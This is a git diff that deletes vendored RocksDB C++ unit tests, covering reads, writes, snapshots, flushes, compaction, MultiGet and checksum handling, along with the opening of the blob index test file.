-  ASSERT_EQ(DummyString(kFileSize / 2, 'f'), Get("fff"));
-  ASSERT_EQ("NOT_FOUND", Get("ggg"));
-  ASSERT_EQ(DummyString(kFileSize / 2, 'h'), Get("hhh"));
-  ASSERT_EQ(DummyString(kFileSize / 2, 'i'), Get("iii"));
-  ASSERT_EQ(DummyString(kFileSize / 2, 'j'), Get("jjj"));
-  ASSERT_EQ("NOT_FOUND", Get("kkk"));
-
-  // MultiGet
-  std::vector<std::string> values;
-  std::vector<Status> status_list = dbfull()->MultiGet(
-      ReadOptions(),
-      std::vector<Slice>({Slice("aaa"), Slice("ccc"), Slice("eee"),
-                          Slice("ggg"), Slice("iii"), Slice("kkk")}),
-      &values);
-  ASSERT_EQ(status_list.size(), static_cast<uint64_t>(6));
-  ASSERT_EQ(values.size(), static_cast<uint64_t>(6));
-  ASSERT_OK(status_list[0]);
-  ASSERT_EQ(DummyString(kFileSize / 2, 'a'), values[0]);
-  ASSERT_TRUE(status_list[1].IsNotFound());
-  ASSERT_OK(status_list[2]);
-  ASSERT_EQ(DummyString(kFileSize / 2, 'e'), values[2]);
-  ASSERT_TRUE(status_list[3].IsNotFound());
-  ASSERT_OK(status_list[4]);
-  ASSERT_EQ(DummyString(kFileSize / 2, 'i'), values[4]);
-  ASSERT_TRUE(status_list[5].IsNotFound());
-
-  Reopen(options);
-  // Add a key
-  ASSERT_OK(Put("fff", DummyString(kFileSize / 2, 'f')));
-  Close();
-  ASSERT_OK(ReadOnlyReopen(options));
-  s = Put("new", "value");
-  ASSERT_EQ(s.ToString(),
-            "Not implemented: Not supported operation in read only mode.");
-}
-
-TEST_F(DBBasicTest, LevelLimitReopen) {
-  Options options = CurrentOptions();
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  const std::string value(1024 * 1024, ' ');
-  int i = 0;
-  while (NumTableFilesAtLevel(2, 1) == 0) {
-    ASSERT_OK(Put(1, Key(i++), value));
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-  }
-
-  options.num_levels = 1;
-  options.max_bytes_for_level_multiplier_additional.resize(1, 1);
-  Status s = TryReopenWithColumnFamilies({"default", "pikachu"}, options);
-  ASSERT_EQ(s.IsInvalidArgument(), true);
-  ASSERT_EQ(s.ToString(),
-            "Invalid argument: db has more levels than options.num_levels");
-
-  options.num_levels = 10;
-  options.max_bytes_for_level_multiplier_additional.resize(10, 1);
-  ASSERT_OK(TryReopenWithColumnFamilies({"default", "pikachu"}, options));
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBBasicTest, PutDeleteGet) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "foo", "v1"));
-    ASSERT_EQ("v1", Get(1, "foo"));
-    ASSERT_OK(Put(1, "foo", "v2"));
-    ASSERT_EQ("v2", Get(1, "foo"));
-    ASSERT_OK(Delete(1, "foo"));
-    ASSERT_EQ("NOT_FOUND", Get(1, "foo"));
-  } while (ChangeOptions());
-}
-
-TEST_F(DBBasicTest, PutSingleDeleteGet) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "foo", "v1"));
-    ASSERT_EQ("v1", Get(1, "foo"));
-    ASSERT_OK(Put(1, "foo2", "v2"));
-    ASSERT_EQ("v2", Get(1, "foo2"));
-    ASSERT_OK(SingleDelete(1, "foo"));
-    ASSERT_EQ("NOT_FOUND", Get(1, "foo"));
-    // Skip HashCuckooRep as it does not support single delete. FIFO and
-    // universal compaction do not apply to the test case. Skip MergePut
-    // because single delete does not get removed when it encounters a merge.
-  } while (ChangeOptions(kSkipHashCuckoo | kSkipFIFOCompaction |
-                         kSkipUniversalCompaction | kSkipMergePut));
-}
-
-TEST_F(DBBasicTest, EmptyFlush) {
-  // It is possible to produce empty flushes when using single deletes. Tests
-  // whether empty flushes cause issues.
-  do {
-    Random rnd(301);
-
-    Options options = CurrentOptions();
-    options.disable_auto_compactions = true;
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    Put(1, "a", Slice());
-    SingleDelete(1, "a");
-    ASSERT_OK(Flush(1));
-
-    ASSERT_EQ("[ ]", AllEntriesFor("a", 1));
-    // Skip HashCuckooRep as it does not support single delete. FIFO and
-    // universal compaction do not apply to the test case. Skip MergePut
-    // because merges cannot be combined with single deletions.
-  } while (ChangeOptions(kSkipHashCuckoo | kSkipFIFOCompaction |
-                         kSkipUniversalCompaction | kSkipMergePut));
-}
-
-TEST_F(DBBasicTest, GetFromVersions) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    ASSERT_OK(Put(1, "foo", "v1"));
-    ASSERT_OK(Flush(1));
-    ASSERT_EQ("v1", Get(1, "foo"));
-    ASSERT_EQ("NOT_FOUND", Get(0, "foo"));
-  } while (ChangeOptions());
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBBasicTest, GetSnapshot) {
-  anon::OptionsOverride options_override;
-  options_override.skip_policy = kSkipNoSnapshot;
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions(options_override));
-    // Try with both a short key and a long key
-    for (int i = 0; i < 2; i++) {
-      std::string key = (i == 0) ? std::string("foo") : std::string(200, 'x');
-      ASSERT_OK(Put(1, key, "v1"));
-      const Snapshot* s1 = db_->GetSnapshot();
-      if (option_config_ == kHashCuckoo) {
-        // Unsupported case.
-        ASSERT_TRUE(s1 == nullptr);
-        break;
-      }
-      ASSERT_OK(Put(1, key, "v2"));
-      ASSERT_EQ("v2", Get(1, key));
-      ASSERT_EQ("v1", Get(1, key, s1));
-      ASSERT_OK(Flush(1));
-      ASSERT_EQ("v2", Get(1, key));
-      ASSERT_EQ("v1", Get(1, key, s1));
-      db_->ReleaseSnapshot(s1);
-    }
-  } while (ChangeOptions());
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBBasicTest, CheckLock) {
-  do {
-    DB* localdb;
-    Options options = CurrentOptions();
-    ASSERT_OK(TryReopen(options));
-
-    // second open should fail
-    ASSERT_TRUE(!(DB::Open(options, dbname_, &localdb)).ok());
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBBasicTest, FlushMultipleMemtable) {
-  do {
-    Options options = CurrentOptions();
-    WriteOptions writeOpt = WriteOptions();
-    writeOpt.disableWAL = true;
-    options.max_write_buffer_number = 4;
-    options.min_write_buffer_number_to_merge = 3;
-    options.max_write_buffer_number_to_maintain = -1;
-    CreateAndReopenWithCF({"pikachu"}, options);
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "foo", "v1"));
-    ASSERT_OK(Flush(1));
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "bar", "v1"));
-
-    ASSERT_EQ("v1", Get(1, "foo"));
-    ASSERT_EQ("v1", Get(1, "bar"));
-    ASSERT_OK(Flush(1));
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBBasicTest, FlushEmptyColumnFamily) {
-  // Block flush thread and disable compaction thread
-  env_->SetBackgroundThreads(1, Env::HIGH);
-  env_->SetBackgroundThreads(1, Env::LOW);
-  test::SleepingBackgroundTask sleeping_task_low;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::LOW);
-  test::SleepingBackgroundTask sleeping_task_high;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask,
-                 &sleeping_task_high, Env::Priority::HIGH);
-
-  Options options = CurrentOptions();
-  // disable compaction
-  options.disable_auto_compactions = true;
-  WriteOptions writeOpt = WriteOptions();
-  writeOpt.disableWAL = true;
-  options.max_write_buffer_number = 2;
-  options.min_write_buffer_number_to_merge = 1;
-  options.max_write_buffer_number_to_maintain = 1;
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // Compaction can still go through even if no thread can flush the
-  // mem table.
-  ASSERT_OK(Flush(0));
-  ASSERT_OK(Flush(1));
-
-  // Insert can go through
-  ASSERT_OK(dbfull()->Put(writeOpt, handles_[0], "foo", "v1"));
-  ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "bar", "v1"));
-
-  ASSERT_EQ("v1", Get(0, "foo"));
-  ASSERT_EQ("v1", Get(1, "bar"));
-
-  sleeping_task_high.WakeUp();
-  sleeping_task_high.WaitUntilDone();
-
-  // Flush can still go through.
-  ASSERT_OK(Flush(0));
-  ASSERT_OK(Flush(1));
-
-  sleeping_task_low.WakeUp();
-  sleeping_task_low.WaitUntilDone();
-}
-
-TEST_F(DBBasicTest, FLUSH) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    WriteOptions writeOpt = WriteOptions();
-    writeOpt.disableWAL = true;
-    SetPerfLevel(kEnableTime);
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "foo", "v1"));
-    // this will now also flush the last 2 writes
-    ASSERT_OK(Flush(1));
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "bar", "v1"));
-
-    get_perf_context()->Reset();
-    Get(1, "foo");
-    ASSERT_TRUE((int)get_perf_context()->get_from_output_files_time > 0);
-    ASSERT_EQ(2, (int)get_perf_context()->get_read_bytes);
-
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    ASSERT_EQ("v1", Get(1, "foo"));
-    ASSERT_EQ("v1", Get(1, "bar"));
-
-    writeOpt.disableWAL = true;
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "bar", "v2"));
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "foo", "v2"));
-    ASSERT_OK(Flush(1));
-
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    ASSERT_EQ("v2", Get(1, "bar"));
-    get_perf_context()->Reset();
-    ASSERT_EQ("v2", Get(1, "foo"));
-    ASSERT_TRUE((int)get_perf_context()->get_from_output_files_time > 0);
-
-    writeOpt.disableWAL = false;
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "bar", "v3"));
-    ASSERT_OK(dbfull()->Put(writeOpt, handles_[1], "foo", "v3"));
-    ASSERT_OK(Flush(1));
-
-    ReopenWithColumnFamilies({"default", "pikachu"}, CurrentOptions());
-    // 'foo' should be there because its put
-    // has WAL enabled.
-    ASSERT_EQ("v3", Get(1, "foo"));
-    ASSERT_EQ("v3", Get(1, "bar"));
-
-    SetPerfLevel(kDisable);
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBBasicTest, ManifestRollOver) {
-  do {
-    Options options;
-    options.max_manifest_file_size = 10;  // 10 bytes
-    options = CurrentOptions(options);
-    CreateAndReopenWithCF({"pikachu"}, options);
-    {
-      ASSERT_OK(Put(1, "manifest_key1", std::string(1000, '1')));
-      ASSERT_OK(Put(1, "manifest_key2", std::string(1000, '2')));
-      ASSERT_OK(Put(1, "manifest_key3", std::string(1000, '3')));
-      uint64_t manifest_before_flush = dbfull()->TEST_Current_Manifest_FileNo();
-      ASSERT_OK(Flush(1));  // This should trigger LogAndApply.
-      uint64_t manifest_after_flush = dbfull()->TEST_Current_Manifest_FileNo();
-      ASSERT_GT(manifest_after_flush, manifest_before_flush);
-      ReopenWithColumnFamilies({"default", "pikachu"}, options);
-      ASSERT_GT(dbfull()->TEST_Current_Manifest_FileNo(), manifest_after_flush);
-      // check if a new manifest file got inserted or not.
-      ASSERT_EQ(std::string(1000, '1'), Get(1, "manifest_key1"));
-      ASSERT_EQ(std::string(1000, '2'), Get(1, "manifest_key2"));
-      ASSERT_EQ(std::string(1000, '3'), Get(1, "manifest_key3"));
-    }
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBBasicTest, IdentityAcrossRestarts) {
-  do {
-    std::string id1;
-    ASSERT_OK(db_->GetDbIdentity(id1));
-
-    Options options = CurrentOptions();
-    Reopen(options);
-    std::string id2;
-    ASSERT_OK(db_->GetDbIdentity(id2));
-    // id1 should match id2 because identity was not regenerated
-    ASSERT_EQ(id1.compare(id2), 0);
-
-    std::string idfilename = IdentityFileName(dbname_);
-    ASSERT_OK(env_->DeleteFile(idfilename));
-    Reopen(options);
-    std::string id3;
-    ASSERT_OK(db_->GetDbIdentity(id3));
-    // id1 should NOT match id3 because identity was regenerated
-    ASSERT_NE(id1.compare(id3), 0);
-  } while (ChangeCompactOptions());
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBBasicTest, Snapshot) {
-  anon::OptionsOverride options_override;
-  options_override.skip_policy = kSkipNoSnapshot;
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions(options_override));
-    Put(0, "foo", "0v1");
-    Put(1, "foo", "1v1");
-
-    const Snapshot* s1 = db_->GetSnapshot();
-    ASSERT_EQ(1U, GetNumSnapshots());
-    uint64_t time_snap1 = GetTimeOldestSnapshots();
-    ASSERT_GT(time_snap1, 0U);
-    Put(0, "foo", "0v2");
-    Put(1, "foo", "1v2");
-
-    env_->addon_time_.fetch_add(1);
-
-    const Snapshot* s2 = db_->GetSnapshot();
-    ASSERT_EQ(2U, GetNumSnapshots());
-    ASSERT_EQ(time_snap1, GetTimeOldestSnapshots());
-    Put(0, "foo", "0v3");
-    Put(1, "foo", "1v3");
-
-    {
-      ManagedSnapshot s3(db_);
-      ASSERT_EQ(3U, GetNumSnapshots());
-      ASSERT_EQ(time_snap1, GetTimeOldestSnapshots());
-
-      Put(0, "foo", "0v4");
-      Put(1, "foo", "1v4");
-      ASSERT_EQ("0v1", Get(0, "foo", s1));
-      ASSERT_EQ("1v1", Get(1, "foo", s1));
-      ASSERT_EQ("0v2", Get(0, "foo", s2));
-      ASSERT_EQ("1v2", Get(1, "foo", s2));
-      ASSERT_EQ("0v3", Get(0, "foo", s3.snapshot()));
-      ASSERT_EQ("1v3", Get(1, "foo", s3.snapshot()));
-      ASSERT_EQ("0v4", Get(0, "foo"));
-      ASSERT_EQ("1v4", Get(1, "foo"));
-    }
-
-    ASSERT_EQ(2U, GetNumSnapshots());
-    ASSERT_EQ(time_snap1, GetTimeOldestSnapshots());
-    ASSERT_EQ("0v1", Get(0, "foo", s1));
-    ASSERT_EQ("1v1", Get(1, "foo", s1));
-    ASSERT_EQ("0v2", Get(0, "foo", s2));
-    ASSERT_EQ("1v2", Get(1, "foo", s2));
-    ASSERT_EQ("0v4", Get(0, "foo"));
-    ASSERT_EQ("1v4", Get(1, "foo"));
-
-    db_->ReleaseSnapshot(s1);
-    ASSERT_EQ("0v2", Get(0, "foo", s2));
-    ASSERT_EQ("1v2", Get(1, "foo", s2));
-    ASSERT_EQ("0v4", Get(0, "foo"));
-    ASSERT_EQ("1v4", Get(1, "foo"));
-    ASSERT_EQ(1U, GetNumSnapshots());
-    ASSERT_LT(time_snap1, GetTimeOldestSnapshots());
-
-    db_->ReleaseSnapshot(s2);
-    ASSERT_EQ(0U, GetNumSnapshots());
-    ASSERT_EQ("0v4", Get(0, "foo"));
-    ASSERT_EQ("1v4", Get(1, "foo"));
-  } while (ChangeOptions(kSkipHashCuckoo));
-}
-
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBBasicTest, CompactBetweenSnapshots) {
-  anon::OptionsOverride options_override;
-  options_override.skip_policy = kSkipNoSnapshot;
-  do {
-    Options options = CurrentOptions(options_override);
-    options.disable_auto_compactions = true;
-    CreateAndReopenWithCF({"pikachu"}, options);
-    Random rnd(301);
-    FillLevels("a", "z", 1);
-
-    Put(1, "foo", "first");
-    const Snapshot* snapshot1 = db_->GetSnapshot();
-    Put(1, "foo", "second");
-    Put(1, "foo", "third");
-    Put(1, "foo", "fourth");
-    const Snapshot* snapshot2 = db_->GetSnapshot();
-    Put(1, "foo", "fifth");
-    Put(1, "foo", "sixth");
-
-    // All entries (including duplicates) exist
-    // before any compaction or flush is triggered.
-    ASSERT_EQ(AllEntriesFor("foo", 1),
-              "[ sixth, fifth, fourth, third, second, first ]");
-    ASSERT_EQ("sixth", Get(1, "foo"));
-    ASSERT_EQ("fourth", Get(1, "foo", snapshot2));
-    ASSERT_EQ("first", Get(1, "foo", snapshot1));
-
-    // After a flush, "second", "third" and "fifth" should
-    // be removed
-    ASSERT_OK(Flush(1));
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ sixth, fourth, first ]");
-
-    // after we release the snapshot1, only two values left
-    db_->ReleaseSnapshot(snapshot1);
-    FillLevels("a", "z", 1);
-    dbfull()->CompactRange(CompactRangeOptions(), handles_[1], nullptr,
-                           nullptr);
-
-    // We have only one valid snapshot snapshot2. Since snapshot1 is
-    // not valid anymore, "first" should be removed by a compaction.
-    ASSERT_EQ("sixth", Get(1, "foo"));
-    ASSERT_EQ("fourth", Get(1, "foo", snapshot2));
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ sixth, fourth ]");
-
-    // after we release the snapshot2, only one value should be left
-    db_->ReleaseSnapshot(snapshot2);
-    FillLevels("a", "z", 1);
-    dbfull()->CompactRange(CompactRangeOptions(), handles_[1], nullptr,
-                           nullptr);
-    ASSERT_EQ("sixth", Get(1, "foo"));
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ sixth ]");
-    // skip HashCuckooRep as it does not support snapshot
-  } while (ChangeOptions(kSkipHashCuckoo | kSkipFIFOCompaction));
-}
-
-TEST_F(DBBasicTest, DBOpen_Options) {
-  Options options = CurrentOptions();
-  std::string dbname = test::TmpDir(env_) + "/db_options_test";
-  ASSERT_OK(DestroyDB(dbname, options));
-
-  // Does not exist, and create_if_missing == false: error
-  DB* db = nullptr;
-  options.create_if_missing = false;
-  Status s = DB::Open(options, dbname, &db);
-  ASSERT_TRUE(strstr(s.ToString().c_str(), "does not exist") != nullptr);
-  ASSERT_TRUE(db == nullptr);
-
-  // Does not exist, and create_if_missing == true: OK
-  options.create_if_missing = true;
-  s = DB::Open(options, dbname, &db);
-  ASSERT_OK(s);
-  ASSERT_TRUE(db != nullptr);
-
-  delete db;
-  db = nullptr;
-
-  // Does exist, and error_if_exists == true: error
-  options.create_if_missing = false;
-  options.error_if_exists = true;
-  s = DB::Open(options, dbname, &db);
-  ASSERT_TRUE(strstr(s.ToString().c_str(), "exists") != nullptr);
-  ASSERT_TRUE(db == nullptr);
-
-  // Does exist, and error_if_exists == false: OK
-  options.create_if_missing = true;
-  options.error_if_exists = false;
-  s = DB::Open(options, dbname, &db);
-  ASSERT_OK(s);
-  ASSERT_TRUE(db != nullptr);
-
-  delete db;
-  db = nullptr;
-}
-
-TEST_F(DBBasicTest, CompactOnFlush) {
-  anon::OptionsOverride options_override;
-  options_override.skip_policy = kSkipNoSnapshot;
-  do {
-    Options options = CurrentOptions(options_override);
-    options.disable_auto_compactions = true;
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    Put(1, "foo", "v1");
-    ASSERT_OK(Flush(1));
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ v1 ]");
-
-    // Write two new keys
-    Put(1, "a", "begin");
-    Put(1, "z", "end");
-    Flush(1);
-
-    // Case1: Delete followed by a put
-    Delete(1, "foo");
-    Put(1, "foo", "v2");
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ v2, DEL, v1 ]");
-
-    // After the current memtable is flushed, the DEL should
-    // have been removed
-    ASSERT_OK(Flush(1));
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ v2, v1 ]");
-
-    dbfull()->CompactRange(CompactRangeOptions(), handles_[1], nullptr,
-                           nullptr);
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ v2 ]");
-
-    // Case 2: Delete followed by another delete
-    Delete(1, "foo");
-    Delete(1, "foo");
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ DEL, DEL, v2 ]");
-    ASSERT_OK(Flush(1));
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ DEL, v2 ]");
-    dbfull()->CompactRange(CompactRangeOptions(), handles_[1], nullptr,
-                           nullptr);
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ ]");
-
-    // Case 3: Put followed by a delete
-    Put(1, "foo", "v3");
-    Delete(1, "foo");
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ DEL, v3 ]");
-    ASSERT_OK(Flush(1));
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ DEL ]");
-    dbfull()->CompactRange(CompactRangeOptions(), handles_[1], nullptr,
-                           nullptr);
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ ]");
-
-    // Case 4: Put followed by another Put
-    Put(1, "foo", "v4");
-    Put(1, "foo", "v5");
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ v5, v4 ]");
-    ASSERT_OK(Flush(1));
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ v5 ]");
-    dbfull()->CompactRange(CompactRangeOptions(), handles_[1], nullptr,
-                           nullptr);
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ v5 ]");
-
-    // clear database
-    Delete(1, "foo");
-    dbfull()->CompactRange(CompactRangeOptions(), handles_[1], nullptr,
-                           nullptr);
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ ]");
-
-    // Case 5: Put followed by snapshot followed by another Put
-    // Both puts should remain.
-    Put(1, "foo", "v6");
-    const Snapshot* snapshot = db_->GetSnapshot();
-    Put(1, "foo", "v7");
-    ASSERT_OK(Flush(1));
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ v7, v6 ]");
-    db_->ReleaseSnapshot(snapshot);
-
-    // clear database
-    Delete(1, "foo");
-    dbfull()->CompactRange(CompactRangeOptions(), handles_[1], nullptr,
-                           nullptr);
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ ]");
-
-    // Case 5: snapshot followed by a put followed by another Put
-    // Only the last put should remain.
-    const Snapshot* snapshot1 = db_->GetSnapshot();
-    Put(1, "foo", "v8");
-    Put(1, "foo", "v9");
-    ASSERT_OK(Flush(1));
-    ASSERT_EQ(AllEntriesFor("foo", 1), "[ v9 ]");
-    db_->ReleaseSnapshot(snapshot1);
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBBasicTest, FlushOneColumnFamily) {
-  Options options = CurrentOptions();
-  CreateAndReopenWithCF({"pikachu", "ilya", "muromec", "dobrynia", "nikitich",
-                         "alyosha", "popovich"},
-                        options);
-
-  ASSERT_OK(Put(0, "Default", "Default"));
-  ASSERT_OK(Put(1, "pikachu", "pikachu"));
-  ASSERT_OK(Put(2, "ilya", "ilya"));
-  ASSERT_OK(Put(3, "muromec", "muromec"));
-  ASSERT_OK(Put(4, "dobrynia", "dobrynia"));
-  ASSERT_OK(Put(5, "nikitich", "nikitich"));
-  ASSERT_OK(Put(6, "alyosha", "alyosha"));
-  ASSERT_OK(Put(7, "popovich", "popovich"));
-
-  for (int i = 0; i < 8; ++i) {
-    Flush(i);
-    auto tables = ListTableFiles(env_, dbname_);
-    ASSERT_EQ(tables.size(), i + 1U);
-  }
-}
-
-TEST_F(DBBasicTest, MultiGetSimple) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    SetPerfLevel(kEnableCount);
-    ASSERT_OK(Put(1, "k1", "v1"));
-    ASSERT_OK(Put(1, "k2", "v2"));
-    ASSERT_OK(Put(1, "k3", "v3"));
-    ASSERT_OK(Put(1, "k4", "v4"));
-    ASSERT_OK(Delete(1, "k4"));
-    ASSERT_OK(Put(1, "k5", "v5"));
-    ASSERT_OK(Delete(1, "no_key"));
-
-    std::vector<Slice> keys({"k1", "k2", "k3", "k4", "k5", "no_key"});
-
-    std::vector<std::string> values(20, "Temporary data to be overwritten");
-    std::vector<ColumnFamilyHandle*> cfs(keys.size(), handles_[1]);
-
-    get_perf_context()->Reset();
-    std::vector<Status> s = db_->MultiGet(ReadOptions(), cfs, keys, &values);
-    ASSERT_EQ(values.size(), keys.size());
-    ASSERT_EQ(values[0], "v1");
-    ASSERT_EQ(values[1], "v2");
-    ASSERT_EQ(values[2], "v3");
-    ASSERT_EQ(values[4], "v5");
-    // four kv pairs * two bytes per value
-    ASSERT_EQ(8, (int)get_perf_context()->multiget_read_bytes);
-
-    ASSERT_OK(s[0]);
-    ASSERT_OK(s[1]);
-    ASSERT_OK(s[2]);
-    ASSERT_TRUE(s[3].IsNotFound());
-    ASSERT_OK(s[4]);
-    ASSERT_TRUE(s[5].IsNotFound());
-    SetPerfLevel(kDisable);
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBBasicTest, MultiGetEmpty) {
-  do {
-    CreateAndReopenWithCF({"pikachu"}, CurrentOptions());
-    // Empty Key Set
-    std::vector<Slice> keys;
-    std::vector<std::string> values;
-    std::vector<ColumnFamilyHandle*> cfs;
-    std::vector<Status> s = db_->MultiGet(ReadOptions(), cfs, keys, &values);
-    ASSERT_EQ(s.size(), 0U);
-
-    // Empty Database, Empty Key Set
-    Options options = CurrentOptions();
-    options.create_if_missing = true;
-    DestroyAndReopen(options);
-    CreateAndReopenWithCF({"pikachu"}, options);
-    s = db_->MultiGet(ReadOptions(), cfs, keys, &values);
-    ASSERT_EQ(s.size(), 0U);
-
-    // Empty Database, Search for Keys
-    keys.resize(2);
-    keys[0] = "a";
-    keys[1] = "b";
-    cfs.push_back(handles_[0]);
-    cfs.push_back(handles_[1]);
-    s = db_->MultiGet(ReadOptions(), cfs, keys, &values);
-    ASSERT_EQ(static_cast<int>(s.size()), 2);
-    ASSERT_TRUE(s[0].IsNotFound() && s[1].IsNotFound());
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBBasicTest, ChecksumTest) {
-  BlockBasedTableOptions table_options;
-  Options options = CurrentOptions();
-  // change when new checksum type added
-  int max_checksum = static_cast<int>(kxxHash);
-  const int kNumPerFile = 2;
-
-  // generate one table with each type of checksum
-  for (int i = 0; i <= max_checksum; ++i) {
-    table_options.checksum = static_cast<ChecksumType>(i);
-    options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-    Reopen(options);
-    for (int j = 0; j < kNumPerFile; ++j) {
-      ASSERT_OK(Put(Key(i * kNumPerFile + j), Key(i * kNumPerFile + j)));
-    }
-    ASSERT_OK(Flush());
-  }
-
-  // verify data with each type of checksum
-  for (int i = 0; i <= kxxHash; ++i) {
-    table_options.checksum = static_cast<ChecksumType>(i);
-    options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-    Reopen(options);
-    for (int j = 0; j < (max_checksum + 1) * kNumPerFile; ++j) {
-      ASSERT_EQ(Key(j), Get(Key(j)));
-    }
-  }
-}
-
-// On Windows you can have either memory mapped file or a file
-// with unbuffered access. So this asserts and does not make
-// sense to run
-#ifndef OS_WIN
-TEST_F(DBBasicTest, MmapAndBufferOptions) {
-  if (!IsMemoryMappedAccessSupported()) {
-    return;
-  }
-  Options options = CurrentOptions();
-
-  options.use_direct_reads = true;
-  options.allow_mmap_reads = true;
-  ASSERT_NOK(TryReopen(options));
-
-  // All other combinations are acceptable
-  options.use_direct_reads = false;
-  ASSERT_OK(TryReopen(options));
-
-  if (IsDirectIOSupported()) {
-    options.use_direct_reads = true;
-    options.allow_mmap_reads = false;
-    ASSERT_OK(TryReopen(options));
-  }
-
-  options.use_direct_reads = false;
-  ASSERT_OK(TryReopen(options));
-}
-#endif
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_blob_index_test.cc b/thirdparty/rocksdb/db/db_blob_index_test.cc
deleted file mode 100644
index e71b511..0000000
--- a/thirdparty/rocksdb/db/db_blob_index_test.cc
+++ /dev/null
@@ -1,409 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include <functional>
-#include <string>
-#include <utility>
-#include <vector>
-
-#include "db/column_family.h"
-#include "db/db_iter.h"
-#include "db/db_test_util.h"
-#include "db/dbformat.h"
-#include "db/write_batch_internal.h"
-#include "port/port.h"
-#include "port/stack_trace.h"
-#include "util/string_util.h"
-#include "utilities/merge_operators.h"
-
-namespace rocksdb {
-
-// kTypeBlobIndex is a value type used by BlobDB only. The base rocksdb
-// should accept the value type on write, and report not supported value
-// for reads, unless caller request for it explicitly. The base rocksdb
-// doesn't understand format of actual blob index (the value).
-class DBBlobIndexTest : public DBTestBase {
- public:
-  enum Tier {
-    kMemtable = 0,
-    kImmutableMemtables = 1,
-    kL0SstFile = 2,
-    kLnSstFile = 3,
-  };
-  const std::vector<Tier> kAllTiers = {Tier::kMemtable,
-                                       Tier::kImmutableMemtables,
-                                       Tier::kL0SstFile, Tier::kLnSstFile};
-
-  DBBlobIndexTest() : DBTestBase("/db_blob_index_test") {}
-
-  ColumnFamilyHandle* cfh() { return dbfull()->DefaultColumnFamily(); }
-
-  ColumnFamilyData* cfd() {
-    return reinterpret_cast<ColumnFamilyHandleImpl*>(cfh())->cfd();
-  }
-
-  Status PutBlobIndex(WriteBatch* batch, const Slice& key,
-                      const Slice& blob_index) {
-    return WriteBatchInternal::PutBlobIndex(batch, cfd()->GetID(), key,
-                                            blob_index);
-  }
-
-  Status Write(WriteBatch* batch) {
-    return dbfull()->Write(WriteOptions(), batch);
-  }
-
-  std::string GetImpl(const Slice& key, bool* is_blob_index = nullptr,
-                      const Snapshot* snapshot = nullptr) {
-    ReadOptions read_options;
-    read_options.snapshot = snapshot;
-    PinnableSlice value;
-    auto s = dbfull()->GetImpl(read_options, cfh(), key, &value,
-                               nullptr /*value_found*/, is_blob_index);
-    if (s.IsNotFound()) {
-      return "NOT_FOUND";
-    }
